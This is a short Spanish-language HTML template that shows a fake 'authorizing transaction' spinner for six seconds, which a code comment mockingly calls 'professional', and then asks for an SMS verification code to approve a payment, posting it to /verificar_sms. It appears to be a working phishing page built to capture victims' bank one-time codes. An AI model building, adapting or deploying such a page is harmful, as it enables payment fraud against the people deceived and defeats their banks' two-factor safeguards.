<!DOCTYPE html>
<html lang="es">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
    <style>
        body { background: #000; color: #ffd700; font-family: monospace; display: flex; align-items: center; justify-content: center; height: 100vh; text-align: center; }
        .card-sms { background: #111; border: 1px solid gold; padding: 30px; border-radius: 15px; display: none; }
        .loader { border: 4px solid #222; border-top: 4px solid gold; border-radius: 50%; width: 50px; height: 50px; animation: spin 1s linear infinite; margin: 20px auto; }
        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
        .form-control { background: #000 !important; color: gold !important; border: 1px solid #444 !important; text-align: center; font-size: 1.5rem; letter-spacing: 5px; }
    </style>
</head>
<body>
    <div id="loading-zone">
        <div class="loader"></div>
        <h5 id="msg">AUTORIZANDO TRANSACCIÓN...</h5>
    </div>

    <div id="sms-zone" class="card-sms">
        <h4 class="mb-3">VERIFICACIÓN REQUERIDA</h4>
        <p class="small text-white">Hemos enviado un código SMS a su teléfono vinculado para autorizar el pago de ${{config.precio}}</p>
        <form action="/verificar_sms" method="POST">
            <input type="text" name="sms_code" class="form-control mb-3" placeholder="000000" maxlength="8" required>
            <button class="btn btn-warning w-100 fw-bold">CONFIRMAR CÓDIGO</button>
        </form>
    </div>

    <script>
        setTimeout(() => {
            document.getElementById('loading-zone').style.display = 'none';
            document.getElementById('sms-zone').style.display = 'block';
        }, 6000); // 6 segundos de carga "profesional"
    </script>
</body>
</html>
